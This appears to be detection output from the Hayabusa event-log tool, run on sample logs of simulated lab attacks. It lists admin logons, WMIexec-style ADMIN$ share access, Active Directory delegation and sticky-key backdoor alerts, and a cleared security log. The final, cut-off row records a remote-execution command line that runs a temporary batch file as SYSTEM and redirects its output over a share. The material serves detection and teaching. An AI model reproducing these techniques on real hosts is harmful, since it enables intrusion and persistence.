17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: 
admmig : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34114 : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 
0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: 
\\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.360 
+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" +2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: 
admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.420 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: 
admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User 
Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any 
protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx +2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
